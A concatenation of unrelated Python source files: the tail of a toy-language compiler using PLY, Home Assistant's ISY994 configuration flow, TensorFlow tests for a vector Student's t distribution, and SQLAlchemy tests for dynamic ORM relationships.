print("Function error: Function is already declared")
exit(1)
def addQuadruple(operation, var1, var2, result):
global quadruples
quadruples.append({'op':operation, 'var1':var1, 'var2':var2, 'result':result})
def completeQuadruple(index, newValue):
quadruples[index]['result'] = newValue
def num(s):
try:
return int(s)
except ValueError:
return float(s)
def getOperand(key):
if key in constants.keys():
return constants[key]
elif key in varLocal.keys():
return varLocal[key]
elif key in varGlobal.keys():
return varGlobal[key]
def resetLocalCounters():
global varLocal
global funcParameters
global localVarCount
global tempVarCount
varLocal = {}
funcParameters = []
localVarCount[BOOL] = 20000
localVarCount[INT] = 22500
localVarCount[FLOAT] = 25000
localVarCount[STRING] = 27500
tempVarCount[BOOL] = 30000
tempVarCount[INT] = 32500
tempVarCount[FLOAT] = 35000
tempVarCount[STRING] = 37500
# Main
if __name__ == '__main__':
# Check for file
if (len(sys.argv) > 1):
file = sys.argv[1]
# Open file
try:
f = open(file, 'r')
data = f.read()
f.close()
# Parse the data
if (yacc.parse(data, tracking = True) == 'OK'):
print(dirProc);
executeVirtualMachine(funcGlobal, quadruples, constants)
except EOFError:
print(EOFError)
else:
print('File missing')
while 1:
try:
s = raw_input('')
except EOFError:
break
if not s:
continue
yacc.parse(s)
| |
"""Config flow for Universal Devices ISY994 integration."""
import logging
from urllib.parse import urlparse
from pyisy.configuration import Configuration
from pyisy.connection import Connection
import voluptuous as vol
from homeassistant import config_entries, core, exceptions
from homeassistant.components import ssdp
from homeassistant.const import CONF_HOST, CONF_NAME, CONF_PASSWORD, CONF_USERNAME
from homeassistant.core import callback
from .const import (
CONF_IGNORE_STRING,
CONF_RESTORE_LIGHT_STATE,
CONF_SENSOR_STRING,
CONF_TLS_VER,
CONF_VAR_SENSOR_STRING,
DEFAULT_IGNORE_STRING,
DEFAULT_RESTORE_LIGHT_STATE,
DEFAULT_SENSOR_STRING,
DEFAULT_TLS_VERSION,
DEFAULT_VAR_SENSOR_STRING,
DOMAIN,
ISY_URL_POSTFIX,
UDN_UUID_PREFIX,
)
_LOGGER = logging.getLogger(__name__)
def _data_schema(schema_input):
"""Generate schema with defaults."""
return vol.Schema(
{
vol.Required(CONF_HOST, default=schema_input.get(CONF_HOST, "")): str,
vol.Required(CONF_USERNAME): str,
vol.Required(CONF_PASSWORD): str,
vol.Optional(CONF_TLS_VER, default=DEFAULT_TLS_VERSION): vol.In([1.1, 1.2]),
},
extra=vol.ALLOW_EXTRA,
)
async def validate_input(hass: core.HomeAssistant, data):
"""Validate the user input allows us to connect.
Data has the keys from DATA_SCHEMA with values provided by the user.
"""
user = data[CONF_USERNAME]
password = data[CONF_PASSWORD]
host = urlparse(data[CONF_HOST])
tls_version = data.get(CONF_TLS_VER)
if host.scheme == "http":
https = False
port = host.port or 80
elif host.scheme == "https":
https = True
port = host.port or 443
else:
_LOGGER.error("The isy994 host value in configuration is invalid")
raise InvalidHost
# Connect to ISY controller.
isy_conf = await hass.async_add_executor_job(
_fetch_isy_configuration,
host.hostname,
port,
user,
password,
https,
tls_version,
host.path,
)
if not isy_conf or "name" not in isy_conf or not isy_conf["name"]:
raise CannotConnect
# Return info that you want to store in the config entry.
return {"title": f"{isy_conf['name']} ({host.hostname})", "uuid": isy_conf["uuid"]}
def _fetch_isy_configuration(
address, port, username, password, use_https, tls_ver, webroot
):
"""Validate and fetch the configuration from the ISY."""
try:
isy_conn = Connection(
address,
port,
username,
password,
use_https,
tls_ver,
webroot=webroot,
)
except ValueError as err:
raise InvalidAuth(err.args[0]) from err
return Configuration(xml=isy_conn.get_config())
class ConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a config flow for Universal Devices ISY994."""
VERSION = 1
CONNECTION_CLASS = config_entries.CONN_CLASS_LOCAL_PUSH
def __init__(self):
"""Initialize the isy994 config flow."""
self.discovered_conf = {}
@staticmethod
@callback
def async_get_options_flow(config_entry):
"""Get the options flow for this handler."""
return OptionsFlowHandler(config_entry)
async def async_step_user(self, user_input=None):
"""Handle the initial step."""
errors = {}
info = None
if user_input is not None:
try:
info = await validate_input(self.hass, user_input)
except CannotConnect:
errors["base"] = "cannot_connect"
except InvalidHost:
errors["base"] = "invalid_host"
except InvalidAuth:
errors["base"] = "invalid_auth"
except Exception: # pylint: disable=broad-except
_LOGGER.exception("Unexpected exception")
errors["base"] = "unknown"
if not errors:
await self.async_set_unique_id(info["uuid"], raise_on_progress=False)
self._abort_if_unique_id_configured()
return self.async_create_entry(title=info["title"], data=user_input)
return self.async_show_form(
step_id="user",
data_schema=_data_schema(self.discovered_conf),
errors=errors,
)
async def async_step_import(self, user_input):
"""Handle import."""
return await self.async_step_user(user_input)
async def async_step_ssdp(self, discovery_info):
"""Handle a discovered isy994."""
friendly_name = discovery_info[ssdp.ATTR_UPNP_FRIENDLY_NAME]
url = discovery_info[ssdp.ATTR_SSDP_LOCATION]
mac = discovery_info[ssdp.ATTR_UPNP_UDN]
if mac.startswith(UDN_UUID_PREFIX):
mac = mac[len(UDN_UUID_PREFIX) :]
if url.endswith(ISY_URL_POSTFIX):
url = url[: -len(ISY_URL_POSTFIX)]
await self.async_set_unique_id(mac)
self._abort_if_unique_id_configured()
self.discovered_conf = {
CONF_NAME: friendly_name,
CONF_HOST: url,
}
self.context["title_placeholders"] = self.discovered_conf
return await self.async_step_user()
class OptionsFlowHandler(config_entries.OptionsFlow):
"""Handle a option flow for isy994."""
def __init__(self, config_entry: config_entries.ConfigEntry):
"""Initialize options flow."""
self.config_entry = config_entry
async def async_step_init(self, user_input=None):
"""Handle options flow."""
if user_input is not None:
return self.async_create_entry(title="", data=user_input)
options = self.config_entry.options
restore_light_state = options.get(
CONF_RESTORE_LIGHT_STATE, DEFAULT_RESTORE_LIGHT_STATE
)
ignore_string = options.get(CONF_IGNORE_STRING, DEFAULT_IGNORE_STRING)
sensor_string = options.get(CONF_SENSOR_STRING, DEFAULT_SENSOR_STRING)
var_sensor_string = options.get(
CONF_VAR_SENSOR_STRING, DEFAULT_VAR_SENSOR_STRING
)
options_schema = vol.Schema(
{
vol.Optional(CONF_IGNORE_STRING, default=ignore_string): str,
vol.Optional(CONF_SENSOR_STRING, default=sensor_string): str,
vol.Optional(CONF_VAR_SENSOR_STRING, default=var_sensor_string): str,
vol.Required(
CONF_RESTORE_LIGHT_STATE, default=restore_light_state
): bool,
}
)
return self.async_show_form(step_id="init", data_schema=options_schema)
class InvalidHost(exceptions.HomeAssistantError):
"""Error to indicate the host value is invalid."""
class CannotConnect(exceptions.HomeAssistantError):
"""Error to indicate we cannot connect."""
class InvalidAuth(exceptions.HomeAssistantError):
"""Error to indicate there is invalid auth."""
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for MultivariateStudentsT Distribution."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from scipy import linalg
from scipy import special
from tensorflow.contrib.distributions.python.ops.vector_student_t import _VectorStudentT
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
class _FakeVectorStudentT(object):
"""Fake scipy implementation for Multivariate Student's t-distribution.
Technically we don't need to test the `Vector Student's t-distribution` since
its composed of only unit-tested parts. However this _FakeVectorStudentT
serves as something like an end-to-end test of the
`TransformedDistribution + Affine` API.
Other `Vector*` implementations need only test new code. That we don't need
to test every Vector* distribution is good because there aren't SciPy
analogs and reimplementing everything in NumPy sort of defeats the point of
having the `TransformedDistribution + Affine` API.
"""
def __init__(self, df, loc, scale_tril):
self._df = np.asarray(df)
self._loc = np.asarray(loc)
self._scale_tril = np.asarray(scale_tril)
def log_prob(self, x):
def _compute(df, loc, scale_tril, x):
k = scale_tril.shape[-1]
ildj = np.sum(np.log(np.abs(np.diag(scale_tril))), axis=-1)
logz = ildj + k * (0.5 * np.log(df) +
0.5 * np.log(np.pi) +
special.gammaln(0.5 * df) -
special.gammaln(0.5 * (df + 1.)))
y = linalg.solve_triangular(scale_tril, np.matrix(x - loc).T,
lower=True, overwrite_b=True)
logs = -0.5 * (df + 1.) * np.sum(np.log1p(y**2. / df), axis=-2)
return logs - logz
if not self._df.shape:
return _compute(self._df, self._loc, self._scale_tril, x)
return np.concatenate([
[_compute(self._df[i], self._loc[i], self._scale_tril[i], x[:, i, :])]
for i in range(len(self._df))]).T
def prob(self, x):
return np.exp(self.log_prob(x))
class VectorStudentTTest(test.TestCase):
def setUp(self):
self._rng = np.random.RandomState(42)
def testProbStaticScalar(self):
with self.cached_session():
# Scalar batch_shape.
df = np.asarray(3., dtype=np.float32)
# Scalar batch_shape.
loc = np.asarray([1], dtype=np.float32)
scale_diag = np.asarray([2.], dtype=np.float32)
scale_tril = np.diag(scale_diag)
expected_mst = _FakeVectorStudentT(
df=df, loc=loc, scale_tril=scale_tril)
actual_mst = _VectorStudentT(df=df, loc=loc, scale_diag=scale_diag,
validate_args=True)
x = 2. * self._rng.rand(4, 1).astype(np.float32) - 1.
self.assertAllClose(expected_mst.log_prob(x),
actual_mst.log_prob(x).eval(),
rtol=0., atol=1e-5)
self.assertAllClose(expected_mst.prob(x),
actual_mst.prob(x).eval(),
rtol=0., atol=1e-5)
def testProbStatic(self):
# Non-scalar batch_shape.
df = np.asarray([1., 2, 3], dtype=np.float32)
# Non-scalar batch_shape.
loc = np.asarray([[0., 0, 0],
[1, 2, 3],
[1, 0, 1]],
dtype=np.float32)
scale_diag = np.asarray([[1., 2, 3],
[2, 3, 4],
[4, 5, 6]],
dtype=np.float32)
scale_tril = np.concatenate([[np.diag(scale_diag[i])]
for i in range(len(scale_diag))])
x = 2. * self._rng.rand(4, 3, 3).astype(np.float32) - 1.
expected_mst = _FakeVectorStudentT(
df=df, loc=loc, scale_tril=scale_tril)
with self.cached_session():
actual_mst = _VectorStudentT(df=df, loc=loc, scale_diag=scale_diag,
validate_args=True)
self.assertAllClose(expected_mst.log_prob(x),
actual_mst.log_prob(x).eval(),
rtol=0., atol=1e-5)
self.assertAllClose(expected_mst.prob(x),
actual_mst.prob(x).eval(),
rtol=0., atol=1e-5)
def testProbDynamic(self):
# Non-scalar batch_shape.
df = np.asarray([1., 2, 3], dtype=np.float32)
# Non-scalar batch_shape.
loc = np.asarray([[0., 0, 0],
[1, 2, 3],
[1, 0, 1]],
dtype=np.float32)
scale_diag = np.asarray([[1., 2, 3],
[2, 3, 4],
[4, 5, 6]],
dtype=np.float32)
scale_tril = np.concatenate([[np.diag(scale_diag[i])]
for i in range(len(scale_diag))])
x = 2. * self._rng.rand(4, 3, 3).astype(np.float32) - 1.
expected_mst = _FakeVectorStudentT(
df=df, loc=loc, scale_tril=scale_tril)
with self.cached_session():
df_pl = array_ops.placeholder(dtypes.float32, name="df")
loc_pl = array_ops.placeholder(dtypes.float32, name="loc")
scale_diag_pl = array_ops.placeholder(dtypes.float32, name="scale_diag")
feed_dict = {df_pl: df, loc_pl: loc, scale_diag_pl: scale_diag}
actual_mst = _VectorStudentT(df=df, loc=loc, scale_diag=scale_diag,
validate_args=True)
self.assertAllClose(expected_mst.log_prob(x),
actual_mst.log_prob(x).eval(feed_dict=feed_dict),
rtol=0., atol=1e-5)
self.assertAllClose(expected_mst.prob(x),
actual_mst.prob(x).eval(feed_dict=feed_dict),
rtol=0., atol=1e-5)
def testProbScalarBaseDistributionNonScalarTransform(self):
# Scalar batch_shape.
df = np.asarray(2., dtype=np.float32)
# Non-scalar batch_shape.
loc = np.asarray([[0., 0, 0],
[1, 2, 3],
[1, 0, 1]],
dtype=np.float32)
scale_diag = np.asarray([[1., 2, 3],
[2, 3, 4],
[4, 5, 6]],
dtype=np.float32)
scale_tril = np.concatenate([[np.diag(scale_diag[i])]
for i in range(len(scale_diag))])
x = 2. * self._rng.rand(4, 3, 3).astype(np.float32) - 1.
expected_mst = _FakeVectorStudentT(
df=np.tile(df, reps=len(scale_diag)),
loc=loc,
scale_tril=scale_tril)
with self.cached_session():
actual_mst = _VectorStudentT(df=df, loc=loc, scale_diag=scale_diag,
validate_args=True)
self.assertAllClose(expected_mst.log_prob(x),
actual_mst.log_prob(x).eval(),
rtol=0., atol=1e-5)
self.assertAllClose(expected_mst.prob(x),
actual_mst.prob(x).eval(),
rtol=0., atol=1e-5)
def testProbScalarBaseDistributionNonScalarTransformDynamic(self):
# Scalar batch_shape.
df = np.asarray(2., dtype=np.float32)
# Non-scalar batch_shape.
loc = np.asarray([[0., 0, 0],
[1, 2, 3],
[1, 0, 1]],
dtype=np.float32)
scale_diag = np.asarray([[1., 2, 3],
[2, 3, 4],
[4, 5, 6]],
dtype=np.float32)
scale_tril = np.concatenate([[np.diag(scale_diag[i])]
for i in range(len(scale_diag))])
x = 2. * self._rng.rand(4, 3, 3).astype(np.float32) - 1.
expected_mst = _FakeVectorStudentT(
df=np.tile(df, reps=len(scale_diag)),
loc=loc,
scale_tril=scale_tril)
with self.cached_session():
df_pl = array_ops.placeholder(dtypes.float32, name="df")
loc_pl = array_ops.placeholder(dtypes.float32, name="loc")
scale_diag_pl = array_ops.placeholder(dtypes.float32, name="scale_diag")
feed_dict = {df_pl: df, loc_pl: loc, scale_diag_pl: scale_diag}
actual_mst = _VectorStudentT(df=df, loc=loc, scale_diag=scale_diag,
validate_args=True)
self.assertAllClose(expected_mst.log_prob(x),
actual_mst.log_prob(x).eval(feed_dict=feed_dict),
rtol=0., atol=1e-5)
self.assertAllClose(expected_mst.prob(x),
actual_mst.prob(x).eval(feed_dict=feed_dict),
rtol=0., atol=1e-5)
def testProbNonScalarBaseDistributionScalarTransform(self):
# Non-scalar batch_shape.
df = np.asarray([1., 2., 3.], dtype=np.float32)
# Scalar batch_shape.
loc = np.asarray([1, 2, 3], dtype=np.float32)
scale_diag = np.asarray([2, 3, 4], dtype=np.float32)
scale_tril = np.diag(scale_diag)
x = 2. * self._rng.rand(4, 3, 3).astype(np.float32) - 1.
expected_mst = _FakeVectorStudentT(
df=df,
loc=np.tile(loc[array_ops.newaxis, :], reps=[len(df), 1]),
scale_tril=np.tile(scale_tril[array_ops.newaxis, :, :],
reps=[len(df), 1, 1]))
with self.cached_session():
actual_mst = _VectorStudentT(df=df, loc=loc, scale_diag=scale_diag,
validate_args=True)
self.assertAllClose(expected_mst.log_prob(x),
actual_mst.log_prob(x).eval(),
rtol=0., atol=1e-5)
self.assertAllClose(expected_mst.prob(x),
actual_mst.prob(x).eval(),
rtol=0., atol=1e-5)
def testProbNonScalarBaseDistributionScalarTransformDynamic(self):
# Non-scalar batch_shape.
df = np.asarray([1., 2., 3.], dtype=np.float32)
# Scalar batch_shape.
loc = np.asarray([1, 2, 3], dtype=np.float32)
scale_diag = np.asarray([2, 3, 4], dtype=np.float32)
scale_tril = np.diag(scale_diag)
x = 2. * self._rng.rand(4, 3, 3).astype(np.float32) - 1.
expected_mst = _FakeVectorStudentT(
df=df,
loc=np.tile(loc[array_ops.newaxis, :], reps=[len(df), 1]),
scale_tril=np.tile(scale_tril[array_ops.newaxis, :, :],
reps=[len(df), 1, 1]))
with self.cached_session():
df_pl = array_ops.placeholder(dtypes.float32, name="df")
loc_pl = array_ops.placeholder(dtypes.float32, name="loc")
scale_diag_pl = array_ops.placeholder(dtypes.float32, name="scale_diag")
feed_dict = {df_pl: df, loc_pl: loc, scale_diag_pl: scale_diag}
actual_mst = _VectorStudentT(df=df, loc=loc, scale_diag=scale_diag,
validate_args=True)
self.assertAllClose(expected_mst.log_prob(x),
actual_mst.log_prob(x).eval(feed_dict=feed_dict),
rtol=0., atol=1e-5)
self.assertAllClose(expected_mst.prob(x),
actual_mst.prob(x).eval(feed_dict=feed_dict),
rtol=0., atol=1e-5)
if __name__ == "__main__":
test.main()
| |
from sqlalchemy import testing, desc, select, func, exc, cast, Integer
from sqlalchemy.orm import (
mapper, relationship, create_session, Query, attributes, exc as orm_exc,
Session, backref, configure_mappers)
from sqlalchemy.orm.dynamic import AppenderMixin
from sqlalchemy.testing import (
AssertsCompiledSQL, assert_raises_message, assert_raises, eq_, is_)
from test.orm import _fixtures
from sqlalchemy.testing.assertsql import CompiledSQL
class _DynamicFixture(object):
def _user_address_fixture(self, addresses_args={}):
users, Address, addresses, User = (self.tables.users,
self.classes.Address,
self.tables.addresses,
self.classes.User)
mapper(
User, users, properties={
'addresses': relationship(
Address, lazy="dynamic", **addresses_args)})
mapper(Address, addresses)
return User, Address
def _order_item_fixture(self, items_args={}):
items, Order, orders, order_items, Item = (self.tables.items,
self.classes.Order,
self.tables.orders,
self.tables.order_items,
self.classes.Item)
mapper(
Order, orders, properties={
'items': relationship(
Item, secondary=order_items, lazy="dynamic",
**items_args)})
mapper(Item, items)
return Order, Item
class DynamicTest(_DynamicFixture, _fixtures.FixtureTest, AssertsCompiledSQL):
def test_basic(self):
User, Address = self._user_address_fixture()
sess = create_session()
q = sess.query(User)
eq_([User(id=7,
addresses=[Address(id=1, email_address='jack@bean.com')])],
q.filter(User.id == 7).all())
eq_(self.static.user_address_result, q.all())
def test_statement(self):
"""test that the .statement accessor returns the actual statement that
would render, without any _clones called."""
User, Address = self._user_address_fixture()
sess = create_session()
q = sess.query(User)
u = q.filter(User.id == 7).first()
self.assert_compile(
u.addresses.statement,
"SELECT addresses.id, addresses.user_id, addresses.email_address "
"FROM "
"addresses WHERE :param_1 = addresses.user_id",
use_default_dialect=True
)
def test_detached_raise(self):
User, Address = self._user_address_fixture()
sess = create_session()
u = sess.query(User).get(8)
sess.expunge(u)
assert_raises(
orm_exc.DetachedInstanceError,
u.addresses.filter_by,
email_address='e'
)
def test_no_uselist_false(self):
User, Address = self._user_address_fixture(
addresses_args={"uselist": False})
assert_raises_message(
exc.InvalidRequestError,
"On relationship User.addresses, 'dynamic' loaders cannot be "
"used with many-to-one/one-to-one relationships and/or "
"uselist=False.",
configure_mappers
)
def test_no_m2o(self):
users, Address, addresses, User = (self.tables.users,
self.classes.Address,
self.tables.addresses,
self.classes.User)
mapper(
Address, addresses, properties={
'user': relationship(User, lazy='dynamic')})
mapper(User, users)
assert_raises_message(
exc.InvalidRequestError,
"On relationship Address.user, 'dynamic' loaders cannot be "
"used with many-to-one/one-to-one relationships and/or "
"uselist=False.",
configure_mappers
)
def test_order_by(self):
User, Address = self._user_address_fixture()
sess = create_session()
u = sess.query(User).get(8)
eq_(
list(u.addresses.order_by(desc(Address.email_address))),
[
Address(email_address='ed@wood.com'),
Address(email_address='ed@lala.com'),
Address(email_address='ed@bettyboop.com')
]
)
def test_configured_order_by(self):
addresses = self.tables.addresses
User, Address = self._user_address_fixture(
addresses_args={"order_by": addresses.c.email_address.desc()})
sess = create_session()
u = sess.query(User).get(8)
eq_(
list(u.addresses),
[
Address(email_address='ed@wood.com'),
Address(email_address='ed@lala.com'),
Address(email_address='ed@bettyboop.com')
]
)
# test cancellation of None, replacement with something else
eq_(
list(u.addresses.order_by(None).order_by(Address.email_address)),
[
Address(email_address='ed@bettyboop.com'),
Address(email_address='ed@lala.com'),
Address(email_address='ed@wood.com')
]
)
# test cancellation of None, replacement with nothing
eq_(
set(u.addresses.order_by(None)),
set([
Address(email_address='ed@bettyboop.com'),
Address(email_address='ed@lala.com'),
Address(email_address='ed@wood.com')
])
)
def test_count(self):
User, Address = self._user_address_fixture()
sess = create_session()
u = sess.query(User).first()
eq_(u.addresses.count(), 1)
def test_dynamic_on_backref(self):
users, Address, addresses, User = (self.tables.users,
self.classes.Address,
self.tables.addresses,
self.classes.User)
mapper(Address, addresses, properties={
'user': relationship(User,
backref=backref('addresses', lazy='dynamic'))
})
mapper(User, users)
sess = create_session()
ad = sess.query(Address).get(1)
def go():
ad.user = None
self.assert_sql_count(testing.db, go, 0)
sess.flush()
u = sess.query(User).get(7)
assert ad not in u.addresses
def test_no_count(self):
User, Address = self._user_address_fixture()
sess = create_session()
q = sess.query(User)
# dynamic collection cannot implement __len__() (at least one that
# returns a live database result), else additional count() queries are
# issued when evaluating in a list context
def go():
eq_(
q.filter(User.id == 7).all(),
[
User(
id=7, addresses=[
Address(id=1, email_address='jack@bean.com')])])
self.assert_sql_count(testing.db, go, 2)
def test_no_populate(self):
User, Address = self._user_address_fixture()
u1 = User()
assert_raises_message(
NotImplementedError,
"Dynamic attributes don't support collection population.",
attributes.set_committed_value, u1, 'addresses', []
)
def test_m2m(self):
Order, Item = self._order_item_fixture(
items_args={"backref": backref("orders", lazy="dynamic")})
sess = create_session()
o1 = Order(id=15, description="order 10")
i1 = Item(id=10, description="item 8")
o1.items.append(i1)
sess.add(o1)
sess.flush()
assert o1 in i1.orders.all()
assert i1 in o1.items.all()
@testing.exclude(
'mysql', 'between', ((5, 1, 49), (5, 1, 52)),
'https://bugs.launchpad.net/ubuntu/+source/mysql-5.1/+bug/706988')
def test_association_nonaliased(self):
items, Order, orders, order_items, Item = (self.tables.items,
self.classes.Order,
self.tables.orders,
self.tables.order_items,
self.classes.Item)
mapper(Order, orders, properties={
'items': relationship(Item,
secondary=order_items,
lazy="dynamic",
order_by=order_items.c.item_id)
})
mapper(Item, items)
sess = create_session()
o = sess.query(Order).first()
self.assert_compile(
o.items,
"SELECT items.id AS items_id, items.description AS "
"items_description FROM items,"
" order_items WHERE :param_1 = order_items.order_id AND "
"items.id = order_items.item_id"
" ORDER BY order_items.item_id",
use_default_dialect=True
)
# filter criterion against the secondary table
# works
eq_(
o.items.filter(order_items.c.item_id == 2).all(),
[Item(id=2)]
)
def test_transient_count(self):
User, Address = self._user_address_fixture()
u1 = User()
u1.addresses.append(Address())
eq_(u1.addresses.count(), 1)
def test_transient_access(self):
User, Address = self._user_address_fixture()
u1 = User()
u1.addresses.append(Address())
eq_(u1.addresses[0], Address())
def test_custom_query(self):
class MyQuery(Query):
pass
User, Address = self._user_address_fixture(
addresses_args={"query_class": MyQuery})
sess = create_session()
u = User()
sess.add(u)
col = u.addresses
assert isinstance(col, Query)
assert isinstance(col, MyQuery)
assert hasattr(col, 'append')
eq_(type(col).__name__, 'AppenderMyQuery')
q = col.limit(1)
assert isinstance(q, Query)
assert isinstance(q, MyQuery)
assert not hasattr(q, 'append')
eq_(type(q).__name__, 'MyQuery')
def test_custom_query_with_custom_mixin(self):
class MyAppenderMixin(AppenderMixin):
def add(self, items):
if isinstance(items, list):
for item in items:
self.append(item)
else:
self.append(items)
class MyQuery(Query):
pass
class MyAppenderQuery(MyAppenderMixin, MyQuery):
query_class = MyQuery
User, Address = self._user_address_fixture(
addresses_args={"query_class": MyAppenderQuery})
sess = create_session()
u = User()
sess.add(u)
col = u.addresses
assert isinstance(col, Query)
assert isinstance(col, MyQuery)
assert hasattr(col, 'append')
assert hasattr(col, 'add')
eq_(type(col).__name__, 'MyAppenderQuery')
q = col.limit(1)
assert isinstance(q, Query)
assert isinstance(q, MyQuery)
assert not hasattr(q, 'append')
assert not hasattr(q, 'add')
eq_(type(q).__name__, 'MyQuery')
class UOWTest(
_DynamicFixture, _fixtures.FixtureTest,
testing.AssertsExecutionResults):
run_inserts = None
def test_persistence(self):
addresses = self.tables.addresses
User, Address = self._user_address_fixture()
sess = create_session()
u1 = User(name='jack')
a1 = Address(email_address='foo')
sess.add_all([u1, a1])
sess.flush()
eq_(
testing.db.scalar(
select(
[func.count(cast(1, Integer))]).
where(addresses.c.user_id != None)),
0)
u1 = sess.query(User).get(u1.id)
u1.addresses.append(a1)
sess.flush()
eq_(
testing.db.execute(
select([addresses]).where(addresses.c.user_id != None)
).fetchall(),
[(a1.id, u1.id, 'foo')]
)
u1.addresses.remove(a1)
sess.flush()
eq_(
testing.db.scalar(
select(
[func.count(cast(1, Integer))]).
where(addresses.c.user_id != None)),
0
)
u1.addresses.append(a1)
sess.flush()
eq_(
testing.db.execute(
select([addresses]).where(addresses.c.user_id != None)
).fetchall(),
[(a1.id, u1.id, 'foo')]
)
a2 = Address(email_address='bar')
u1.addresses.remove(a1)
u1.addresses.append(a2)
sess.flush()
eq_(
testing.db.execute(
select([addresses]).where(addresses.c.user_id != None)
).fetchall(),
[(a2.id, u1.id, 'bar')]
)
def test_merge(self):
addresses = self.tables.addresses
User, Address = self._user_address_fixture(
addresses_args={"order_by": addresses.c.email_address})
sess = create_session()
u1 = User(name='jack')
a1 = Address(email_address='a1')
a2 = Address(email_address='a2')
a3 = Address(email_address='a3')
u1.addresses.append(a2)
u1.addresses.append(a3)
sess.add_all([u1, a1])
sess.flush()
u1 = User(id=u1.id, name='jack')
u1.addresses.append(a1)
u1.addresses.append(a3)
u1 = sess.merge(u1)
eq_(attributes.get_history(u1, 'addresses'), (
[a1],
[a3],
[a2]
))
sess.flush()
eq_(
list(u1.addresses),
[a1, a3]
)
def test_hasattr(self):
User, Address = self._user_address_fixture()
u1 = User(name='jack')
assert 'addresses' not in u1.__dict__
u1.addresses = [Address(email_address='test')]
assert 'addresses' in u1.__dict__
def test_collection_set(self):
addresses = self.tables.addresses
User, Address = self._user_address_fixture(
addresses_args={"order_by": addresses.c.email_address})
sess = create_session(autoflush=True, autocommit=False)
u1 = User(name='jack')
a1 = Address(email_address='a1')
a2 = Address(email_address='a2')
a3 = Address(email_address='a3')
a4 = Address(email_address='a4')
sess.add(u1)
u1.addresses = [a1, a3]
eq_(list(u1.addresses), [a1, a3])
u1.addresses = [a1, a2, a4]
eq_(list(u1.addresses), [a1, a2, a4])
u1.addresses = [a2, a3]
eq_(list(u1.addresses), [a2, a3])
u1.addresses = []
eq_(list(u1.addresses), [])
def test_noload_append(self):
# test that a load of User.addresses is not emitted
# when flushing an append
User, Address = self._user_address_fixture()
sess = Session()
u1 = User(name="jack", addresses=[Address(email_address="a1")])
sess.add(u1)
sess.commit()
u1_id = u1.id
sess.expire_all()
u1.addresses.append(Address(email_address='a2'))
self.assert_sql_execution(
testing.db,
sess.flush,
CompiledSQL(
"SELECT users.id AS users_id, users.name AS users_name "
"FROM users WHERE users.id = :param_1",
lambda ctx: [{"param_1": u1_id}]),
CompiledSQL(
"INSERT INTO addresses (user_id, email_address) "
"VALUES (:user_id, :email_address)",
lambda ctx: [{'email_address': 'a2', 'user_id': u1_id}]
)
)
def test_noload_remove(self):
# test that a load of User.addresses is not emitted
# when flushing a remove
User, Address = self._user_address_fixture()
sess = Session()
u1 = User(name="jack", addresses=[Address(email_address="a1")])
a2 = Address(email_address='a2')
u1.addresses.append(a2)
sess.add(u1)
sess.commit()
u1_id = u1.id
a2_id = a2.id
sess.expire_all()
u1.addresses.remove(a2)
self.assert_sql_execution(
testing.db,
sess.flush,
CompiledSQL(
"SELECT addresses.id AS addresses_id, addresses.email_address "
"AS addresses_email_address FROM addresses "
"WHERE addresses.id = :param_1",
lambda ctx: [{'param_1': a2_id}]
),
CompiledSQL(
"UPDATE addresses SET user_id=:user_id WHERE addresses.id = "
":addresses_id",
lambda ctx: [{'addresses_id': a2_id, 'user_id': None}]
),
CompiledSQL(
"SELECT users.id AS users_id, users.name AS users_name "
"FROM users WHERE users.id = :param_1",
lambda ctx: [{"param_1": u1_id}]),
)
def test_rollback(self):
User, Address = self._user_address_fixture()
sess = create_session(
expire_on_commit=False, autocommit=False, autoflush=True)
u1 = User(name='jack')
u1.addresses.append(Address(email_address='lala@hoho.com'))
sess.add(u1)
sess.flush()
sess.commit()
u1.addresses.append(Address(email_address='foo@bar.com'))
eq_(
u1.addresses.order_by(Address.id).all(),
[
Address(email_address='lala@hoho.com'),
Address(email_address='foo@bar.com')
]
)
sess.rollback()
eq_(
u1.addresses.all(),
[Address(email_address='lala@hoho.com')]
)
def _test_delete_cascade(self, expected):
addresses = self.tables.addresses
User, Address = self._user_address_fixture(
addresses_args={
"order_by": addresses.c.id,
"backref": "user",
"cascade": "save-update" if expected else "all, delete"})
sess = create_session(autoflush=True, autocommit=False)
u = User(name='ed')
u.addresses.extend(
[Address(email_address=letter) for letter in 'abcdef']
)
sess.add(u)
sess.commit()
eq_(testing.db.scalar(addresses.count(addresses.c.user_id == None)), 0)
eq_(testing.db.scalar(addresses.count(addresses.c.user_id != None)), 6)
sess.delete(u)
sess.commit()
if expected:
eq_(
testing.db.scalar(
addresses.count(addresses.c.user_id == None)), 6)
eq_(
testing.db.scalar(
addresses.count(addresses.c.user_id != None)), 0)
else:
eq_(testing.db.scalar(addresses.count()), 0)
def test_delete_nocascade(self):
self._test_delete_cascade(True)
def test_delete_cascade(self):
self._test_delete_cascade(False)
def test_self_referential(self):
Node, nodes = self.classes.Node, self.tables.nodes
mapper(
Node, nodes, properties={
'children': relationship(
Node, lazy="dynamic", order_by=nodes.c.id)})
sess = Session()
n2, n3 = Node(), Node()
n1 = Node(children=[n2, n3])
sess.add(n1)
sess.commit()
eq_(n1.children.all(), [n2, n3])
def test_remove_orphans(self):
addresses = self.tables.addresses
User, Address = self._user_address_fixture(
addresses_args={
"order_by": addresses.c.id,
"backref": "user",
"cascade": "all, delete-orphan"})
sess = create_session(autoflush=True, autocommit=False)
u = User(name='ed')
u.addresses.extend(
[Address(email_address=letter) for letter in 'abcdef']
)
sess.add(u)
for a in u.addresses.filter(
Address.email_address.in_(['c', 'e', 'f'])):
u.addresses.remove(a)
eq_(
set(ad for ad, in sess.query(Address.email_address)),
set(['a', 'b', 'd'])
)
def _backref_test(self, autoflush, saveuser):
User, Address = self._user_address_fixture(
addresses_args={"backref": "user"})
sess = create_session(autoflush=autoflush, autocommit=False)
u = User(name='buffy')
a = Address(email_address='foo@bar.com')
a.user = u
if saveuser:
sess.add(u)
else:
sess.add(a)
if not autoflush:
sess.flush()
assert u in sess
